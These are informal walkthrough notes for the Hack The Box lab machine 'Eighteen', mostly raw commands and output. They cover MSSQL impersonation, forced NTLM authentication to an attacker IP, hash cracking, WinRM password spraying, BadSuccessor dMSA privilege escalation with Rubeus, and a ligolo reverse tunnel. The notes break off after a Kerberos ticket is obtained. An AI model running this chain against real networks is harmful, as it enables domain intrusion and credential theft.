Here is my note on EIGHTEEN box from Hackthebox.
EIGHTEEN: 10.10.11.95
As is common in real life Windows penetration tests, you will start the Eighteen box with credentials for the following account: kevin / iNa2we6haRj2gaw!
kevin:iNa2we6haRj2gaw!
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://eighteen.htb/ -H "Host: FUZZ.eighteen.htb"
Admin Login: http://eighteen.htb/admin
admin:iloveyou1 #FROM MSSQL.
Flask Financial Planner v1.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RC0+
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-11-21T00:16:44+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-20T23:31:38
|_Not valid after: 2055-11-20T23:31:38
mssqlclient.py kevin:'iNa2we6haRj2gaw!'@10.10.11.95
#NO XP_CMDSHELL
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
SQL (kevin guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
------
appdev
SQL (kevin guest@master)> select name,sysadmin from syslogins
name sysadmin
------ --------
sa 1
kevin 0
appdev 0
SQL (kevin guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
-------- ---------------- ----------- -------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
xp_dirtree '\\10.10.14.148\any\thing'
xp_dirtree \\10.10.14.148\any\thing
Responder:
[SMB] NTLMv2-SSP Client : 10.10.11.95
[SMB] NTLMv2-SSP Username : EIGHTEEN\mssqlsvc
[SMB] NTLMv2-SSP Hash : mssqlsvc::EIGHTEEN:dbd2134ea329ab67:1B17953AB6B9B47ECAF36345B7AF5AC1:01010000000000008018B85C295ADC010382934F3CBE48A00000000002000800450057004800450001001E00570049004E002D0034004E00540044004F0043004A00390050005200460004003400570049004E002D0034004E00540044004F0043004A0039005000520046002E0045005700480045002E004C004F00430041004C000300140045005700480045002E004C004F00430041004C000500140045005700480045002E004C004F00430041004C00070008008018B85C295ADC01060004000200000008003000300000000000000000000000003000001D44BA99E6C9588D47BA157B6E86CB8CE16B092AE8A76CF7C8E00B1199DBC5F60A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
mssqlsvc::EIGHTEEN:dbd2134ea329ab67:1B17953AB6B9B47ECAF36345B7AF5AC1:01010000000000008018B85C295ADC010382934F3CBE48A00000000002000800450057004800450001001E00570049004E002D0034004E00540044004F0043004A00390050005200460004003400570049004E002D0034004E00540044004F0043004A0039005000520046002E0045005700480045002E004C004F00430041004C000300140045005700480045002E004C004F00430041004C000500140045005700480045002E004C004F00430041004C00070008008018B85C295ADC01060004000200000008003000300000000000000000000000003000001D44BA99E6C9588D47BA157B6E86CB8CE16B092AE8A76CF7C8E00B1199DBC5F60A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340038000000000000000000
#NOPE, uncrackeable, forget it !
SQL (kevin guest@master)> select name, database_id from sys.databases;
name database_id
----------------- -----------
master 1
tempdb 2
model 3
msdb 4
financial_planner 5 #INTERESTING #appdev ?
1> EXECUTE AS LOGIN = 'appdev'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
SQL (appdev appdev@master)> SELECT name FROM financial_planner..syslogins WHERE sysadmin = '1';
name
----
sa
#appdev allow to access financial_planner.
select table_name, table_schema from financial_planner.INFORMATION_SCHEMA.TABLES;
SQL (appdev appdev@master)> select table_name, table_schema from financial_planner.INFORMATION_SCHEMA.TABLES;
table_name table_schema
----------- ------------
users dbo
incomes dbo
expenses dbo
allocations dbo
analytics dbo
visits dbo
select * from users.dbo.financial_planner
SELECT * from financial_planner.dbo.users;
PBKDF2-SHA256 Hash Cracking:
SQL (appdev appdev@master)> SELECT * from financial_planner.dbo.users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
1004 test90 test test90@test.com pbkdf2:sha256:600000$ihAUcJdi8KGkZFx9$5747eff5949e7e654b51c30bd3472d73a4a0166ce2bb11106449bef1141d948b
admin:pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
test:pbkdf2:sha256:600000$ihAUcJdi8KGkZFx9$5747eff5949e7e654b51c30bd3472d73a4a0166ce2bb11106449bef1141d948b
https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256
https://gist.github.com/Pyp-3/9e49fe88c05a788a6c8d46092d5000d2
https://notes.benheater.com/books/hash-cracking/page/pbkdf2-hmac-sha256-bPZ
https://github.com/n0rmh3ll/PBKDF2-SHA256-Hash-Cracker
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/PBKDF2-SHA256-Hash-Cracker]
└─# gcc -O3 -o pbkdf2_cracker pbkdf2_cracker.c -lssl -lcrypto
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/PBKDF2-SHA256-Hash-Cracker]
└─# ls
pbkdf2_cracker pbkdf2_cracker.c README.md
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/PBKDF2-SHA256-Hash-Cracker]
└─# ./pbkdf2_cracker
[*] PBKDF2 SHA256 Cracker (C Version)
[*] Iterations: 600000
[*] Salt: AMtzteQIG7yAbZIa (16 bytes)
[*] Target: 0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
[*] Cracking...
^C
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/PBKDF2-SHA256-Hash-Cracker]
└─# sudo leafpad pbkdf2_cracker.c
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/PBKDF2-SHA256-Hash-Cracker]
└─# ./pbkdf2_cracker
[*] PBKDF2 SHA256 Cracker (C Version)
[*] Iterations: 600000
[*] Salt: AMtzteQIG7yAbZIa (16 bytes)
[*] Target: 0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133
[*] Cracking...
[+] PASSWORD FOUND: iloveyou1
[*] Time elapsed: 95.67 seconds
[*] Total tested: 234 passwords
[*] Speed: 2.45 pwd/sec
john --format=PBKDF2-HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt --fork=4 pkbdf-sha256.txt #DON'T WORK
admin:iloveyou1
SELECT name, type_desc, create_date, modify_date FROM sys.server_principals WHERE type_desc IN ('SQL_LOGIN','WINDOWS_LOGIN','WINDOWS_GROUP') ORDER BY name;
SQL (kevin guest@master)> SELECT DEFAULT_DOMAIN();
--------
EIGHTEEN
SELECT SUSER_SID('EIGHTEEN\Domain Admins')
SQL (kevin guest@master)> SELECT SUSER_SID('EIGHTEEN\Domain Admins')
-----------------------------------------------------------
b'010500000000000515000000dfdeac44d4131d236f599b7600020000'
$BinarySID = "010500000000000515000000dfdeac44d4131d236f599b7600020000"
$SIDBytes = [byte[]]::new($BinarySID.Length / 2)
for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
$SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
}
$SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
$SID.Value
PS C:\Users\User> $BinarySID = "010500000000000515000000dfdeac44d4131d236f599b7600020000"
PS C:\Users\User> $SIDBytes = [byte[]]::new($BinarySID.Length / 2)
PS C:\Users\User> for ($i = 0; $i -lt $BinarySID.Length; $i += 2) {
>> $SIDBytes[$i / 2] = [convert]::ToByte($BinarySID.Substring($i, 2), 16)
>> }
PS C:\Users\User> $SID = New-Object System.Security.Principal.SecurityIdentifier($SIDBytes, 0)
PS C:\Users\User> $SID.Value
S-1-5-21-1152179935-589108180-1989892463-512
S-1-5-21-1152179935-589108180-1989892463
#NOPE
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN]
└─# sudo msfconsole -q
[*] Starting persistent handler(s)...
msf > use auxiliary/admin/mssql/mssql_enum_domain_accounts
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > show options
Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 10000 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentication (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set USERNAME kevin
USERNAME => kevin
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set PASSWORD iNa2we6haRj2gaw!
PASSWORD => iNa2we6haRj2gaw!
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > set RHOSTS 10.10.11.95
RHOSTS => 10.10.11.95
msf auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.10.11.95
[*] 10.10.11.95:1433 - Attempting to connect to the database server at 10.10.11.95:1433 as kevin...
[+] 10.10.11.95:1433 - Connected.
[*] 10.10.11.95:1433 - SQL Server Name: DC01
[SNIP]
[*] 10.10.11.95:1433 - - EIGHTEEN\jamie.dunn
[*] 10.10.11.95:1433 - - EIGHTEEN\jane.smith
[*] 10.10.11.95:1433 - - EIGHTEEN\alice.jones
[*] 10.10.11.95:1433 - - EIGHTEEN\adam.scott
[*] 10.10.11.95:1433 - - EIGHTEEN\bob.brown
[*] 10.10.11.95:1433 - - EIGHTEEN\carol.white
[*] 10.10.11.95:1433 - - EIGHTEEN\dave.green
Hacking SQL Server Procedures – Part 4: Enumerating Domain Accounts
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
pass.txt:
iNa2we6haRj2gaw!
iloveyou1
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/10.10.11.95]
└─# nxc winrm 10.10.11.95 -u users.txt -p pass.txt
WINRM 10.10.11.95 5985 DC01 [*] 10.0 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\kevin:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\adam.scott:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\bob.brown:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\carol.white:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\dave.green:iNa2we6haRj2gaw!
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\kevin:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.10.11.95 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.10.11.95 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/EIGHTEEN/10.10.11.95]
└─# evil-winrm -i 10.10.11.95 -u adam.scott -p 'iloveyou1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.scott\Documents> whoami
eighteen\adam.scott
*Evil-WinRM* PS C:\Users\adam.scott\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> whoami
eighteen\adam.scott
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> dir
Directory: C:\Users\adam.scott\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/20/2025 7:24 PM 34 user.txt
*Evil-WinRM* PS C:\Users\adam.scott\Desktop> type user.txt
6aa9edb4e178ea19e341720aa36aa189
USER.TXT: 6aa9edb4e178ea19e341720aa36aa189
PRIV ESC:
No kerberoasting and asreproasting.
Get-ObjectAcl -Identity "TargetOU" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild" }
BadSuccessor:
https://medium.com/@happycamper84/tryhackme-badsuccessor-walkthrough-2c5090bd31fc?__goaway_challenge=resource-load&__goaway_id=de7b15bbdca7b706094c0b1dec614827
https://www.hackingarticles.in/abusing-badsuccessor-dmsa-stealthy-privilege-escalation/
https://www.alteredsecurity.com/post/bettersuccessor-still-abusing-dmsa-for-privilege-escalation-badsuccessor-after-patch
https://www.hackingarticles.in/abusing-badsuccessor-dmsa-stealthy-privilege-escalation/
https://github.com/akamai/BadSuccessor
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Get-BadSuccessorOUPermissions.ps1
Identity OUs
-------- ---
EIGHTEEN\IT {OU=Staff,DC=eighteen,DC=htb}
adam.scott is a member of IT group.
Import-Module .\BadSuccessor.ps1
BadSuccessor -mode check -Domain eighteen.htb
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Import-Module .\BadSuccessor.ps1
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode check -Domain eighteen.htb
[+] Checking for Windows Server 2025 Domain Controllers...
[!] Windows Server 2025 DCs found. BadSuccessor may be exploitable!
HostName OperatingSystem
-------- ---------------
DC01.eighteen.htb Windows Server 2025 Datacenter
BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "ATTACKER_DMSA" -DelegatedAdmin "adam.scott" -DelegatedTarget "Administrator" -domain "eighteen.htb"
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "ATTACKER_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Exception calling "CommitChanges" with "0" argument(s): "The object already exists.
"
At C:\Users\adam.scott\Documents\BadSuccessor.ps1:231 char:9
+ $newChild.CommitChanges()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DotNetMethodException
Successfully created and configured dMSA 'ATTACKER_DMSA'
Object adam.scott can now impersonate Administrator
*Evil-WinRM* PS C:\Users\adam.scott\Documents> BadSuccessor -mode exploit -Path "OU=Staff,DC=eighteen,DC=htb" -Name "ATTACKER123_DMSA" -DelegatedAdmin "adam.scott" -DelegateTarget "Administrator" -domain "eighteen.htb"
Creating dMSA at: LDAP://eighteen.htb/OU=Staff,DC=eighteen,DC=htb
0
0
0
0
Successfully created and configured dMSA 'ATTACKER123_DMSA'
Object adam.scott can now impersonate Administrator
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./SharpSuccessor.exe add /impersonate:Administrator /path:"ou=Staff,dc=eighteen,dc=htb" /account:adam.scott /name:ATTACKER123_DMSA
_____ _ _____
/ ____| | / ____|
| (___ | |__ __ _ _ __ _ __| (___ _ _ ___ ___ ___ ___ ___ ___ _ __
\___ \| '_ \ / _` | '__| '_ \\___ \| | | |/ __/ __/ _ \/ __/ __|/ _ \| '__|
____) | | | | (_| | | | |_) |___) | |_| | (_| (_| __/\__ \__ \ (_) | |
|_____/|_| |_|\__,_|_| | .__/_____/ \__,_|\___\___\___||___/___/\___/|_|
| |
|_|
@_logangoins
[+] Adding dnshostname ATTACKER123_DMSA.eighteen.htb
[+] Adding samaccountname ATTACKER123_DMSA$
[+] Administrator's DN identified
[+] Attempting to write msDS-ManagedAccountPrecededByLink
[+] Wrote attribute successfully
[+] Attempting to write msDS-DelegatedMSAState attribute
[+] Attempting to set access rights on the dMSA object
[+] Attempting to write msDS-SupportedEncryptionTypes attribute
[+] Attempting to write userAccountControl attribute
Error: The object already exists.
SharpSuccessor.exe add /impersonate:ADMINISTRATOR /path:"ou=Staff,dc=eighteen,dc=htb" /account:adam.scott /name:ATTACKER12345_DMSA
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=Staff,dc=eighteen,dc=htb" /account:adam.scott /name:BAD_dMSA
Rubeus.exe tgtdeleg /nowrap
python3 BadSuccessor.py -u adam.scott -p 'iloveyou1' -d eighteen.htb -dc dc01.eighteen.htb -ou Staff
Screw this, we are going to do this exploit in linux so set up ligolo as usual.
IPv4 Address. . . . . . . . . . . : 10.10.11.95(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.254.0
sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:53
./agent.exe -connect 10.10.14.148:53 -ignore-cert
sudo ip route add 240.0.0.1/32 dev ligolo
nmap 240.0.0.1 -sV
sudo ip route add 10.10.11.0/24 dev ligolo
https://docs.ligolo.ng/Localhost/
https://notes.benheater.com/books/network-pivoting/page/pivoting-with-ligolo-ng
https://red.infiltr8.io/a-d/movement/dacl/badsuccessor-dmsa-abuse#unix-like
https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-dmsa/#credential-dumping
nxc ldap 240.0.0.1 -u adam.scott -p iloveyou1 -M badsuccessor
https://github.com/b5null/Invoke-BadSuccessor.ps1/
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Import-Module .\Invoke-BadSuccessor.ps1
*Evil-WinRM* PS C:\Users\adam.scott\Documents> Invoke-BadSuccessor
[!] Computer 'Pwn' already exists.
[+] Machine Account's sAMAccountName : Pwn$
[+] Machine Account's SID : S-1-5-21-1152179935-589108180-1989892463-12104
[+] Created delegated service account 'attacker_dMSA' in 'OU=Staff,DC=eighteen,DC=htb'.
[+] Service Account's sAMAccountName : attacker_dMSA$
[+] Service Account's SID : S-1-5-21-1152179935-589108180-1989892463-12112
[+] Allowed to retrieve password : Pwn$
[+] Added ACE on 'CN=attacker_dMSA,OU=Staff,DC=eighteen,DC=htb' for 'adam.scott' (S-1-5-21-1152179935-589108180-1989892463-1609) with rights 'All' (Allow,
ThisObjectOnly).
[+] Granted 'GenericAll' on 'attacker_dMSA$' to 'adam.scott'.
[+] Configured delegated MSA state for 'attacker_dMSA$' with predecessor:
CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] Next steps (Rubeus):
Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
Rubeus.exe asktgt /user:Pwn$ /aes256:<AES256KEY> /domain:eighteen.htb
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/eighteen.htb /dmsa /opsec /ptt /nowrap /outfile:ticket.kirbi /ticket:<BASE64TGT>
[+] Alternative (Impacket):
getST.py 'eighteen.htb/Pwn$:Password123!' -k -no-pass -dmsa -self -impersonate 'attacker_dMSA$'
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe hash /password:'Password123!' /user:Pwn$ /domain:eighteen.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123!
[*] Input username : Pwn$
[*] Input domain : eighteen.htb
[*] Salt : EIGHTEEN.HTBhostpwn.eighteen.htb
[*] rc4_hmac : 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] aes128_cts_hmac_sha1 : A4369F3F47382720482549ACA7B36353
[*] aes256_cts_hmac_sha1 : 07CE45274C9D70F6C47ACD9D72838A4D292903CBC8947E2C32B7F9E0ECF17D0B
[*] des_cbc_md5 : D5150802CB46C419
./Rubeus.exe asktgt /user:Pwn$ /aes256:07CE45274C9D70F6C47ACD9D72838A4D292903CBC8947E2C32B7F9E0ECF17D0B /domain:eighteen.htb
*Evil-WinRM* PS C:\Users\adam.scott\Documents> ./Rubeus.exe asktgt /user:Pwn$ /aes256:07CE45274C9D70F6C47ACD9D72838A4D292903CBC8947E2C32B7F9E0ECF17D0B /dom
ain:eighteen.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGT
[*] Using aes256_cts_hmac_sha1 hash: 07CE45274C9D70F6C47ACD9D72838A4D292903CBC8947E2C32B7F9E0ECF17D0B
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\Pwn$'
[*] Using domain controller: fe80::81d3:a8f7:56a7:facd%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+g
AwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA2nm07C
J04LucS6MLP5h/Q8wymLcvBmt1lB9e2DSMVbLIEvAtQxq7rFoHnyMedE2z5RU1bk0SmBHX61G4M6MUZb
OZ7vx+ADaUDItSgCmSzIWJlDwTydE33RzCNSYu+fVcDqynjf4VCOthakfB4/agGb87+zFUerYgx6xKsP
0JC9R7J8GFhyNbmqayHa8JMnP7y0R8FNuCvnBuQu3B+wvC3R+JQ6epLLIxESTKBeoufnPwDYBO/ubgmK
TzwFeez9b0j8Al3a6NfARDgUwlFPbi15huqhjxUgj/gHyZwL6Yg9p7fzY5gVzXLYF4BdROHCqOHNE+g0
FlSgtXAz5GYSrOAz8ReVHObDlGQVfqbMR7xSB1vUBgK5fbm0UvT+xOKtVt5ATvlvsWeMsZnKIu10jY9E
XEAWRNqERbUrFPTSxqrCl07y6rnzMKRDGWwZes540kVLBtZVEmJfocRxluk8PdLzCaXthZlaeUIV05dE
ijAJnWMp8lMKsatxBp9PR/mBuPEEKUVyHh/WJyBRAXl0RqnXsCy/AYUCZpR/5unqmdSTNd7Gxu98Eus4
Ta9MDZTuRb3BEeUm7+VT96v6+eYC/7JZJHgWXW1kUeRCqNCV9Jk217XVvHQqRLwmqPyI2aUeGTw1BtZv
Bjj5YDQ5Z2VvYmevn7y4VvcV+so7kyEeR/9yM9AwR4N5lEC9yM5N1SeucydrNJnhGSkSi2rgnt5ba7xc
wTb+F7SuJlXfIm0vUBCjVD7DGY15Nm7gkKX3WOqNJpycW/RlI1VCcN1Zw3fmkoOMJequ4tCvHHjitbI6
cJJZJJWiUOUysqlMLwWlOppH3PZdHitIBH9TcOjX9K//GVFCgfaE6VokLs8nzfL590d9lzRoqCJAleu4
R3RhGLJ4DFa5f2dvQ3i51t7qVplIbSEqwJyRGfUzYJMuHIsbVlZi1l3Or2VZg+QG3ND+AI9tXe0slL52
daEnqOyTa3if4BtnW4BrFHfHmd1ooREyUdI1JB26mFnYKalzsucac+QGGhPH/OftZsHmt0b+JrXmxOrk
IhqIDZJDZV8CAut0vd6+ii0ga47SlIU9ezG1ytCHROuZ9gSQA14oFymJhhEnnP+oGpxgj88+ru9CltUI
6LFZkYEFR/Bln7PEck72vFgsFZG5uG4A3erlmGHTLb9M9mtd737BdUUe+fvOKdaxoME4mtyyO9LphdA8
ApV2v8UhlxwrVlRLzAivDvzkngns3d2ZyPM52JqNOw307KT5QHHovGEZ+ZrbW1INy2hFHXN9BVseD7lt
ZKJWL5ggT2+k7mf7Q0dkSMO2tCjCHapJsGikpbg+C6csqQ0sXHgUCSyhBbS3hzKgg3tcOiCGs5M0YNY3
Ae/LNDrIpyMnzSAXD6OB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIAdq
evxWSvzGGViuT715YW/dd1gA1wBtgZiy+sEtT+SKoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYb
BFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQxMTAxMDlaphEYDzIwMjUxMjI0MjEwMTA5WqcRGA8yMDI1
MTIzMTExMDEwOVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5o
dGI=
ServiceName : krbtgt/eighteen.htb
ServiceRealm : EIGHTEEN.HTB
UserName : Pwn$
UserRealm : EIGHTEEN.HTB
StartTime : 12/24/2025 2:58:33 AM
EndTime : 12/24/2025 12:58:33 PM
RenewTill : 12/31/2025 2:58:33 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : PJPGpe3q6yJVrzymx52X2Ua6lB8EcFvpT/whsXPBxBk=
ASREP (key) : 07CE45274C9D70F6C47ACD9D72838A4D292903CBC8947E2C32B7F9E0ECF17D0B
doIFYjCCBV6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ4bDEVJR0hURUVOLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMZWlnaHRlZW4uaHRio4IEIzCCBB+gAwIBEqEDAgECooIEEQSCBA2nm07CJ04LucS6MLP5h/Q8wymLcvBmt1lB9e2DSMVbLIEvAtQxq7rFoHnyMedE2z5RU1bk0SmBHX61G4M6MUZbOZ7vx+ADaUDItSgCmSzIWJlDwTydE33RzCNSYu+fVcDqynjf4VCOthakfB4/agGb87+zFUerYgx6xKsP0JC9R7J8GFhyNbmqayHa8JMnP7y0R8FNuCvnBuQu3B+wvC3R+JQ6epLLIxESTKBeoufnPwDYBO/ubgmKTzwFeez9b0j8Al3a6NfARDgUwlFPbi15huqhjxUgj/gHyZwL6Yg9p7fzY5gVzXLYF4BdROHCqOHNE+g0FlSgtXAz5GYSrOAz8ReVHObDlGQVfqbMR7xSB1vUBgK5fbm0UvT+xOKtVt5ATvlvsWeMsZnKIu10jY9EXEAWRNqERbUrFPTSxqrCl07y6rnzMKRDGWwZes540kVLBtZVEmJfocRxluk8PdLzCaXthZlaeUIV05dEijAJnWMp8lMKsatxBp9PR/mBuPEEKUVyHh/WJyBRAXl0RqnXsCy/AYUCZpR/5unqmdSTNd7Gxu98Eus4Ta9MDZTuRb3BEeUm7+VT96v6+eYC/7JZJHgWXW1kUeRCqNCV9Jk217XVvHQqRLwmqPyI2aUeGTw1BtZvBjj5YDQ5Z2VvYmevn7y4VvcV+so7kyEeR/9yM9AwR4N5lEC9yM5N1SeucydrNJnhGSkSi2rgnt5ba7xcwTb+F7SuJlXfIm0vUBCjVD7DGY15Nm7gkKX3WOqNJpycW/RlI1VCcN1Zw3fmkoOMJequ4tCvHHjitbI6cJJZJJWiUOUysqlMLwWlOppH3PZdHitIBH9TcOjX9K//GVFCgfaE6VokLs8nzfL590d9lzRoqCJAleu4R3RhGLJ4DFa5f2dvQ3i51t7qVplIbSEqwJyRGfUzYJMuHIsbVlZi1l3Or2VZg+QG3ND+AI9tXe0slL52daEnqOyTa3if4BtnW4BrFHfHmd1ooREyUdI1JB26mFnYKalzsucac+QGGhPH/OftZsHmt0b+JrXmxOrkIhqIDZJDZV8CAut0vd6+ii0ga47SlIU9ezG1ytCHROuZ9gSQA14oFymJhhEnnP+oGpxgj88+ru9CltUI6LFZkYEFR/Bln7PEck72vFgsFZG5uG4A3erlmGHTLb9M9mtd737BdUUe+fvOKdaxoME4mtyyO9LphdA8ApV2v8UhlxwrVlRLzAivDvzkngns3d2ZyPM52JqNOw307KT5QHHovGEZ+ZrbW1INy2hFHXN9BVseD7ltZKJWL5ggT2+k7mf7Q0dkSMO2tCjCHapJsGikpbg+C6csqQ0sXHgUCSyhBbS3hzKgg3tcOiCGs5M0YNY3Ae/LNDrIpyMnzSAXD6OB4jCB36ADAgEAooHXBIHUfYHRMIHOoIHLMIHIMIHFoCswKaADAgESoSIEIAdqevxWSvzGGViuT715YW/dd1gA1wBtgZiy+sEtT+SKoQ4bDEVJR0hURUVOLkhUQqIRMA+gAwIBAaEIMAYbBFB3biSjBwMFAEDhAAClERgPMjAyNTEyMjQxMTAxMDlaphEYDzIwMjUxMjI0MjEwMTA5WqcRGA8yMDI1MTIzMTExMDEwOVqoDhsMRUlHSFRFRU4uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxlaWdodGVlbi5odGI=
